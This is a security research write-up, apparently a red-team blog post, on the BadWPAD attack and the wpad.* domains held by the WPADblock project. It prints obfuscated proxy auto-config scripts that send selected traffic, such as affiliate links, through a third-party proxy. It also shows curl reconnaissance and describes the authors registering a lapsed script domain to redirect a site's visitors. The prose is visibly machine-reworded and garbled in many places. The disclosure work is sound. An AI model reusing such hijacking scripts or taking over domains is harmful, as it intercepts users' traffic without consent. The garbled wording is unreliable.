Quoting resolv.conf (Linux) man page for “search” option: “Search list for host-name lookup. The search list is usually determined from the local domain name; by default, it contains only the local domain name. This may be changed by listing the desired domain search way following the search keyword with spaces or tabs separating the names. Resolver queries having less than ndots dots (default is 1) in them will be attempted utilizing each component of the search way in turn until a match is found. For environments with multiple subdomains delight read options ndots:n below to avoid man-in-the-middle attacks and unnecessary traffic for the root-dns-servers. Note that this process may be slow and will make quite a few network traffic if the servers for the listed domains are not local, and that queries will timeout if no server is available for 1 of the domains”. In short it means that erstwhile we will usage “search pl" and visit http://redteam/ the resolver will first effort http://redteam.pl/. This option is the same as “dns-search pl” in /etc/network/interfaces (Linux). In Windows this option is called DNS suffix and besides works identical. specified DNS suffix configuration is retrieved by the client from DHCP, but can besides be (manually) modified on each system.
Commonly Windows (i.a. Windows 10) by default has enabled Web Proxy Auto-Discovery Protocol (WPAD), quoting Wikipedia this is: “Method utilized by clients to find the URL of a configuration file utilizing DHCP and/or DNS discovery methods. erstwhile detection and download of the configuration file is complete, it can be executed to find the proxy for a specified URL”.
Searching for WPAD is made with DNS queries and besides utilizing LLMNR and NBNS protocols:
Which we can find in Wireshark utilizing display filter:
nbns.name == "WPAD<00>" || dns.qry.name == "wpad"
nbns.name == "WPAD<00>" || dns.qry.name == "wpad"
BadWPAD is an attack erstwhile a malicious actor, usually but not only in LAN, is responding for WPAD requests. Windows systems will besides search for WPAD utilizing DNS querying based on DNS suffix, e.g. for the “pl” DNS suffix it will be wpad.pl, in this case if specified hostname (wpad.pl) will be found, then Windows will effort to fetch the WPAD configuration (/wpad.dat) from http://wpad.pl/wpad.dat.
GET /wpad.dat HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: WinHttp-Autoproxy-Service/5.1
Host: wpad.pl
HTTP/1.1 200 OK
Server: openresty
Date: Tue, 30 Apr 2019 11:32:47 GMT
Content-Type: application/x-ns-proxy-autoconfig
Content-Length: 505
Last-Modified: Mon, 29 Apr 2019 10:31:44 GMT
Connection: keep-alive
ETag: "5cc6d290-1f9"
Expires: Thu, 09 May 2019 14:44:16 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes
// WPADblock - monitoring and protecting leaking WPAD.* traffic since 2007.
// Your computer SHOULD NOT be downloading this file. delight fix your network configuration.
// Read more at https://www.wpadblock.com
function FindProxyForURL(url, host) {
// usage proxy for wpadblocking.com and wpadleaking.com domains
if(/http:\/\/([.wpad]{4})?([bloc]|[lea])+king\.([.a-z]{1,6}|com)/.test(url)) { return "PROXY 144.76.184.43:80; DIRECT"; }
// usage direct for everything else
return "DIRECT";
}
If DNS suffix will be set to awesome.redteam.pl, Windows requests wpad.dat file from WPAD servers until a server responds with the file. It tries different URLs within domain:
1. http://wpad.awesome.redteam.pl/wpad.dat
2. http://wpad.redteam.pl/wpad.dat
3. http://wpad.pl/wpad.dat
Also another TLDs are crucial due to the fact that for DNS suffix
um.warszawa.pl (address of the authoritative website of the capital of Poland) it will be:
1. http://wpad.um.warszawa.pl/wpad.dat
2. http://wpad.warszawa.pl/wpad.dat
3. http://wpad.pl/wpad.datIf successful, the browser will access the net via proxy from wpad.dat.
Let’s check how many WPAD top level domains are registered in case of Polish TLDs:
wpad.pl has address 144.76.184.43
wpad.com.pl has address 144.76.184.43
wpad.biz.pl has address 144.76.184.43
wpad.edu.pl has address 144.76.184.43
wpad.info.pl has address 144.76.184.43
wpad.net.pl has address 144.76.184.43
wpad.org.pl has address 144.76.184.43
wpad.bydgoszcz.pl has address 144.76.184.43
wpad.katowice.pl has address 144.76.184.43
wpad.olsztyn.pl has address 144.76.184.43
wpad.opole.pl has address 144.76.184.43
wpad.radom.pl has address 144.76.184.43
wpad.rzeszow.pl has address 144.76.184.43
wpad.slask.pl has address 144.76.184.43
wpad.szczecin.pl has address 144.76.184.43
wpad.warszawa.pl has address 144.76.184.43
wpad.waw.pl has address 144.76.184.43
wpad.zgora.pl has address 144.76.184.43
All of this popular Polish TLDs are resoling to single IP address 144.76.184.43 which is located in Germany (AS24940 Hetzner Online GmbH).
It means that if individual is utilizing DNS suffix warszawa.pl and will look for WPAD, Windows will find wpad.warszawa.pl and burden the WPAD config from http://wpad.warszawa.pl/wpad.dat. There is besides an crucial problem mentioned before, if e.g. city office of Warsaw is utilizing DNS suffix um.warszawa.pl, and there is no wpad.um.warszawa.pl, then it will usage wpad.warszawa.pl, which is pointing to the same IP address as wpad.pl.
Let’s check if the above TLDs are serving WPAD scripts (wpad.dat):
$ for wpad in $(echo wpad.pl wpad.com.pl wpad.biz.pl wpad.edu.pl wpad.info.pl wpad.net.pl wpad.org.pl wpad.bydgoszcz.pl wpad.katowice.pl wpad.olsztyn.pl wpad.opole.pl wpad.radom.pl wpad.rzeszow.pl wpad.slask.pl wpad.szczecin.pl wpad.warszawa.pl wpad.waw.pl wpad.zgora.pl);do echo $wpad && curl -s -i $wpad/wpad.dat | grep Content-Type;done
wpad.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.com.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.biz.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.edu.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.info.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.net.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.org.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.bydgoszcz.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.katowice.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.olsztyn.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.opole.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.radom.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.rzeszow.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.slask.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.szczecin.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.warszawa.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.waw.pl
Content-Type: application/x-ns-proxy-autoconfig
wpad.zgora.pl
Content-Type: application/x-ns-proxy-autoconfig
Unfortunately yes, but at this moment (28 Apr 2019 10:28:54 GMT) this is not malicious:
$ curl -i http://wpad.pl/wpad.dat
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 28 Apr 2019 10:28:54 GMT
Content-Type: application/x-ns-proxy-autoconfig
Content-Length: 488
Last-Modified: Mon, 18 Mar 2019 19:51:20 GMT
Connection: keep-alive
ETag: "5c8ff6b8-1e8"
Expires: Sun, 05 May 2019 10:28:54 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes
// WPADblock - monitoring and protecting leaking WPAD.* traffic since 2007.
// Your computer SHOULD NOT be downloading this file. delight fix your network configuration.
// Read more at https://www.wpadblock.com
function FindProxyForURL(url, host) {
// usage proxy for wpadblocking.com and wpadleaking.com domains
if(/http:\/\/[.wpad]{4}([block]|[leak])+ing.com/.test(url)) { return "PROXY 144.76.184.43:80; DIRECT"; }
// usage direct for everything else
return "DIRECT";
}
But it doesn’t give any warranty that it will not service any malicious content in the future or will change the content for short period of time, or even service this e.g. to clients of a single ISP, CIDR etc. If a malicious actor knows that e.g. any ISP is utilizing search domain “pl” then he can service malicious content just for their ASN, and everyone else will get a non malicious script. This approach will minimize the hazard of detecting specified threat.
$ curl -i http://wpad.pl
HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Sun, 28 Apr 2019 10:29:22 GMT
Content-Type: text/html
Content-Length: 158
Connection: keep-alive
Location: https://www.booking.com/index.html?aid=1300873
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>openresty</center>
</body>
</html>
Currently the main domains specified as wpad.pl are forwarding to Booking.com affiliate program, not even to the website with information about this task [https://www.wpadblock.com/]. Quoting WPADblock task “We've been registering wpad.* domains since 2007 to prevent malicious use. These domains pose respective safety threats, ranging from simple MITM attacks, ending with possible distant code execution. delight mention to the links provided below for further information. We presently do not disclose information on how frequently these domains are queried. We do nevertheless gather statistical information, that can be shared for the purposes of safety investigation at any time”. From a victim position information about the task can only be found in the wpad.dat script – by analysis of BadWPAD attack details.
Proxy from the above wpad.dat is set to IP address 144.76.184.43:80 and is besides forwarding to booking.com (and with advanced probability logs all requests):
GET http://detectportal.firefox.com/success.txt HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: close
HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Wed, 01 May 2019 16:39:24 GMT
Content-Type: text/html
Content-Length: 158
Connection: close
Location: https://www.booking.com/index.html?aid=1300873
Allow: GET, POST, HEAD
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>openresty</center>
</body>
</html>
If this would be replaced by a malicious WPAD script it could lead to a massive infection of i.a. Polish computers, but not only, due to the fact that in fact this IP is pointing to dozens of “wpad” TLDs, based on information from PassiveTotal, i.a. wpad.be, wpad.blog, wpad.cam, wpad.cat, wpad.cc, wpad.center, wpad.com.ar, wpad.com.co, wpad.com.es, wpad.com.tw, wpad.com.ua, wpad.computer, wpad.cz, wpad.direct, wpad.domains, wpad.ee, wpad.es, wpad.eu.org, wpad.gr, wpad.group, wpad.hr, wpad.im, wpad.info, wpad.it, wpad.kiev.ua, wpad.live, wpad.ltd, wpad.lv, wpad.me.uk, wpad.msk.ru, wpad.name, wpad.net.ar, wpad.net.br, wpad.net.cn, wpad.network, wpad.nom.es, wpad.org.cn, wpad.org.es, wpad.plus, wpad.pro, wpad.run, wpad.sk, wpad.ski, wpad.systems, wpad.team, wpad.tv, wpad.tw, wpad.vip, wpad.ws, wpad.xxx and wpad.zone.
Currently the following TLDs from IANA list [https://data.iana.org/TLD/tlds-alpha-by-domain.txt] are pointing to the IP address of this project:
wpad.cc has address 144.76.184.43
wpad.cz has address 144.76.184.43
wpad.ee has address 144.76.184.43
wpad.gr has address 144.76.184.43
wpad.hr has address 144.76.184.43
wpad.im has address 144.76.184.43
wpad.it has address 144.76.184.43
wpad.lv has address 144.76.184.43
wpad.pl has address 144.76.184.43
wpad.sk has address 144.76.184.43
wpad.tv has address 144.76.184.43
wpad.tw has address 144.76.184.43
wpad.ws has address 144.76.184.43
wpad.cat has address 144.76.184.43
wpad.computer has address 144.76.184.43
wpad.direct has address 144.76.184.43
wpad.domains has address 144.76.184.43
wpad.group has address 144.76.184.43
wpad.info has address 144.76.184.43
wpad.live has address 144.76.184.43
wpad.ltd has address 144.76.184.43
wpad.name has address 144.76.184.43
wpad.network has address 144.76.184.43
wpad.plus has address 144.76.184.43
wpad.pro has address 144.76.184.43
wpad.systems has address 144.76.184.43
wpad.vip has address 144.76.184.43
wpad.xxx has address 144.76.184.43
wpad.zone has address 144.76.184.43
Most of these domains are utilizing CloudFlare, but any are using:
ns1.wpadblock.com has address 144.76.184.43
ns2.wpadblock.com has address 79.98.145.34
ns3.wpadblock.com has address 193.70.13.218
ns2.wpadblock.com (fns1.42.pl) and ns3.wpadblock.com (fns2.42.pl) are IPs from FreeDNS::42 [https://freedns.42.pl].
Most WHOISes for all above domains are privacy protected – hiding the information about who is the owner of each domain, but any are not protected, for example following:
• wpad.cam
Registrant Organization: QRMedia Sp. z o. o.
• wpad.cat
Billing Name: Tomasz Koperski
Billing Organization: QRMedia Sp. z o. o.
Billing Street: Wernyhory 1
Billing City: Warsaw
Billing State/Province: Województwo Mazowieckie
Billing Postal Code: 02-727
Billing Country: PL
Billing Phone: +48.880000056
Billing telephone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: domains@qrmedia.pl
• wpad.cz
org: QRMedia Sp. z o. o.
name: Tomasz Koperski
address: Pulawska 182
address: Warszawa
address: 02670
address: PL
• wpad.hr
Registrant Name: QRMEDIA SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ
Registrant Street: Puławska 182
Registrant City: Warszawa
Registrant State/Province: PL
Registrant Postal Code: 02-670
Please note that all above informations are public and possible to get without any costs from open-source and designed for this WHOIS databases. Domains as registered by Polish company, not a private individual – due to this follow GDPR law we are allowed to print it.
During writing of this article, we were able to takeover (register at 2019-04-29T06:32:15.0Z) the domain wpadleaking.com which was utilized in <script> tags on task website by the address www.wpadblock.com. We were able to control users visiting task website and forward them i.a. to this article. This was identified by the task owner in just fewer hours and later the domain was changed in the website HTML code:
$ curl -s www.wpadblock.com | grep -B1 vulnerable.js
<!-- Good catch RED TEAM, switched to different domain -->
<script src="http://wpadblocking.com/vulnerable.js"></script>
$ whois wpadblocking.com | grep ^Creation
Creation Date: 2019-04-29T14:01:51.00Z
In the meantime we got any visits:
103.123.84.107 - - [01/May/2019:07:41:55 +0200] "GET / HTTP/1.1" 500 3513 "http://wpadleaking.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
103.123.84.119 - - [01/May/2019:07:41:54 +0200] "GET / HTTP/1.1" 500 3513 "http://wpadleaking.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
103.123.84.90 - - [01/May/2019:07:41:56 +0200] "GET / HTTP/1.1" 500 3513 "http://wpadleaking.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
103.123.84.99 - - [01/May/2019:07:41:55 +0200] "GET / HTTP/1.1" 500 3513 "http://wpadleaking.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
106.12.101.74 - - [29/Apr/2019:15:29:27 +0200] "GET / HTTP/1.1" 302 3644 "http://wpad.name/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
167.114.232.244 - - [01/May/2019:00:45:07 +0200] "GET / HTTP/1.1" 302 4217 "http://www.wpadleaking.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
66.249.64.62 - - [29/Apr/2019:13:59:59 +0200] "GET / HTTP/1.1" 302 4217 "http://wpad.info/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.11.113.74 - - [29/Apr/2019:14:12:27 +0200] "GET / HTTP/2.0" 302 60 "http://wpad.co/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"7.36"
Which shows that in fact there is activity of users. After they realised our interest in this task they besides immediately stopped serving WPAD configuration (wpad.dat), but there are copies available made by the Wayback Machine
web.archive.org [http://web.archive.org/web/20171225164836/http://wpad.pl/wpad.dat, http://web.archive.org/web/20171225164836if_/http://wpad.pl/wpad.dat], which are more interesting due to the fact that they contain other, possibly malicious scripts:
// WPADblock.com task - monitoring and protecting leaking WPAD.* traffic since 2007. Read more at www.wpadblock.com
//
// Your computer SHOULD NOT be downloading this file. delight fix your network configuration.
// Read more on WPAD security: http://www.trendmicro.co.uk/media/misc/wp-badwpad.pdf
function FindProxyForURL(url, host) {
// LOCAL: investigation and stats. Regular expression patterns for testsite.local
if ((isInNet(myIpAddress(), "172.16.44.0", "255.255.255.0") && ((( shExpMatch(url, "*test*te.loc*/?ecur?/*") && !shExpMatch(url, "*1?222?1*") ) || ( shExpMatch(url, "*testsi*.lo?al/s*e/*txt") && !shExpMatch(url, "*2*88*") && (shExpMatch(url, "*3?13*")))))) || (shExpMatch(url, "*p:/*b?o*g.*/*") && shExpMatch(url, "*tt*oo*in*"))) { return "PROXY 144.76.184.43:80"; }
// REMOTE: all outside planet traffic: DIRECT
return "DIRECT";
}
/*
FILE ARCHIVED ON 16:48:36 Dec 25, 2017 AND RETRIEVED FROM THE
net ARCHIVE ON 22:13:02 May 01, 2019.
JAVASCRIPT APPENDED BY WAYBACK MACHINE, COPYRIGHT net ARCHIVE.
ALL another CONTENT MAY besides BE PROTECTED BY COPYRIGHT (17 U.S.C.
SECTION 108(a)(3)).
*/
After small beautifying and colouring for better reading and understanding:
if ((isInNet(myIpAddress(), "172.16.44.0", "255.255.255.0") &&
(((shExpMatch(url, "*test*te.loc*/?ecur?/*") &&
!shExpMatch(url, "*1?222?1*")) ||
(shExpMatch(url, "*testsi*.lo?al/s*e/*txt") &&
!shExpMatch(url, "*2*88*") && (shExpMatch(url, "*3?13*"))))))
||
(shExpMatch(url, "*p:/*b?o*g.*/*") && shExpMatch(url, "*tt*oo*in*"))) {
return "PROXY 144.76.184.43:80";
}
// REMOTE: all outside planet traffic: DIRECT
return "DIRECT";
}
An older copy of this script, from 2016, contains even more conditions [http://web.archive.org/web/20160316084421/http://wpad.pl/wpad.dat, http://web.archive.org/web/20160316084421if_/http://wpad.pl/wpad.dat]:
// WpadBlock.com project
// investigating regular expressions
function FindProxyForURL(url, host) {
if( ( shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") && !shExpMatch(url, "*aQNVZ?AU*") ) || ( shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*") ) || ( shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") && !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*") ) || ( shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") && !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") && !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*") ) || ( ( shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") || shExpMatch(url, "ht*w?pl*s5?0.*/*id=*") ) ) || ( shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*") ) || ( shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*") ) || ( shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*")) ) || ( shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*") ) || ( shExpMatch(url, "*p://af?.?pti*ar?.c??/*") && !shExpMatch(url, "*8?67*") ) || ( shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") && !shExpMatch(url, "*75?6*6*") ) ) return "PROXY 144.76.184.43:80";
return "DIRECT";
}
/*
FILE ARCHIVED ON 08:44:21 Mar 16, 2016 AND RETRIEVED FROM THE
net ARCHIVE ON 22:17:02 May 01, 2019.
JAVASCRIPT APPENDED BY WAYBACK MACHINE, COPYRIGHT net ARCHIVE.
ALL another CONTENT MAY besides BE PROTECTED BY COPYRIGHT (17 U.S.C.
SECTION 108(a)(3)).
*/
Same script in the copy from 07 Jul 2015 [http://web.archive.org/web/20150707025003/http://wpad.it:80/wpad.dat], so time of serving this was long.
function FindProxyForURL(url, host) {
if ((shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") &&
!shExpMatch(url, "*aQNVZ?AU*")) ||
(shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*")) ||
(shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") &&
!shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*")) ||
(shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") &&
!shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") &&
!shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*"))
||
((shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") ||
shExpMatch(url, "ht*w?pl*s5?0.*/*id=*"))) ||
(shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*")) ||
(shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") &&
!shExpMatch(url, "*a_7?59?b*")) ||
(shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") ||
shExpMatch(url, "*.?rs?c?m/we?3/") ||
(shExpMatch(url, "*.hr??*hot*?do*off*") &&
!shExpMatch(url, "*10?35?2?39*"))) ||
(shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") &&
!shExpMatch(url, "*d=1?90*")) ||
(shExpMatch(url, "*p://af?.?pti*ar?.c??/*") &&
!shExpMatch(url, "*8?67*")) ||
(shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") &&
!shExpMatch(url, "*75?6*6*")))
return "PROXY 144.76.184.43:80";
return "DIRECT";
}
Actually this shows a proof for possible malicious behaviour, for example the following regex:
h?t*/*w.b?*k?ng.c*m/*aid*
is matching the forwarding to Booking.com affiliate program which was utilized fewer days ago:
https://www.booking.com/index.html?aid=1300873
In my opinion this obfuscation was made to hide malicious behaviour of the WPAD script, I don’t see any another reason in this case. First of all this company is registering specified domains and describe this approach as related to anti-BadWPAD attacks, and secondly it is serving a WPAD script which is not just returning DIRECT but besides catches any parts of traffic by redirecting to their own proxy. All of this doesn't inspire assurance and it looks like it may hide malicious behaviour under a noble goal. Another reason to believe that this could be malicious is shortly after we started researching this case they removed wpad.dat scripts. besides the domain wpad.pl started redirecting to the task homepage:
$ curl -I http://wpad.pl
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 01 May 2019 23:58:38 GMT
Content-Type: text/html
Content-Length: 182
Connection: keep-alive
Location: http://www.wpadblock.com
When fewer hours before it redirected to Booking.com affiliate program:
HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Wed, 01 May 2019 16:39:24 GMT
Content-Type: text/html
Content-Length: 158
Connection: close
Location: https://www.booking.com/index.html?aid=1300873
Isn’t this all suspicious?
Company QRMedia Sp. z o. o. which registered these domains truly exists in Poland (KRS 0000386027 [https://ekrs.ms.gov.pl/web/wyszukiwarka-krs], NIP 1132838203) and their website https://www.qrmedia.pl is forwarding to https://www.dnsoverride.com, which is simply a DNS related product. This is interesting due to the fact that cost of all this domains are not low and the task is not even utilized as any advertisement. This is the question of whether the collected data is not utilized for any malicious or unethical purposes? We have only limited amounts of data but above mentioned regexs prove that it could be utilized at least to make money on affiliate programs, which besides make sense why it was profitable to pay for all of these domains for many years (for example wpad.pl is registered since 2008). Anyway specified projects – which in fact lead to man-in-the-middle (MITM) attack – even if, should be made only by authorized CERT teams (like CERT Polska in case of wpad.pl), in which we can trust, not by a (small, not even infosec) private company. delight note that this is not just about havings specified domains, but what is crucial – serving WPAD script with configuration which leads to at least proxying any parts of traffic over 3rd organization servers for wiretapping and highly possible modifying traffic (like replacing affiliate program IDs with own etc). crucial point to note there is that the served WPAD scripts are intentionally obfuscated. delight keep in head that this server can be besides just hacked any time or domain wpadblock.com can be taken over etc – then this infrastructure can start service malicious content too, which can lead to massive infection. All of this proves that specified domains should be sinkholed as shortly as possible by CERT teams that have jurisdiction over these resources (TLDs, IP address etc).
References
- https://www.us-cert.gov/ncas/alerts/TA16-144A (WPAD Name Collision Vulnerability)
- https://blog.redteam.pl/2019/05/badwpad-and-wpad-pl-wpadblocking-com.html
- https://www.blackhat.com/docs/us-16/materials/us-16-Goncharov-BadWpad.pdf (slides 15 and 16 shows how immense this problem is)